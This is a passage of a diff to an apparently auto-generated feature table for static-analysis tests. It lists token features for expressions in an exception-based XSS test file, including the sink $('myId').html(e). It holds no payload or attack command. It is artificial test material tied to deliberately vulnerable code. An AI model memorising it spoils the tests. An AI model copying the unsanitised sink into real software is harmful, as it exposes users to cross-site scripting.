| e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:72:6:72:17 | myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:74:14 | myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:74:14 | myWeirdInner | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:74:14 | myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:74:14 | myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:74:14 | myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeird ... x);\\n\\t\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeird ... x);\\n\\t\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeird ... x);\\n\\t\\t} | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeird ... x);\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeird ... x);\\n\\t\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeirdInner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:3:76:3 | myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | inner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | this | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | this | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | this | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:74:17 | this | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | 'arguments' object of function myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | 'arguments' object of function myWeirdInner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | 'arguments' object of function myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | 'arguments' object of function myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | 'arguments' object of function myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | exceptional return of function myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | exceptional return of function myWeirdInner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | exceptional return of function myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | exceptional return of function myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | exceptional return of function myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | functio ... x);\\n\\t\\t} | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | functio ... x);\\n\\t\\t} | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | functio ... x);\\n\\t\\t} | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | functio ... x);\\n\\t\\t} | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | functio ... x);\\n\\t\\t} | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | return of function myWeirdInner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | return of function myWeirdInner | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | return of function myWeirdInner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | return of function myWeirdInner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:18:76:3 | return of function myWeirdInner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:74:28:74:28 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:8 | inner | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:8 | inner | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:8 | inner | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:8 | inner | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:8 | inner | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | exceptional return of inner(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | exceptional return of inner(x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | exceptional return of inner(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | exceptional return of inner(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | exceptional return of inner(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | inner(x) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | inner(x) | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | inner(x) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | inner(x) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:4:75:11 | inner(x) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | CalleeFlexibleAccessPath | inner | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | InputArgumentIndex | 0 | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:75:10:75:10 | x | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:77:11:77:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:77:11:77:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:77:11:77:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:77:11:77:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:77:11:77:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:3:78:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:5:78:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:5:78:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:5:78:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18988,6 +128955,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:78:5:78:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:5:78:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:78:5:78:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:78:13:78:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| 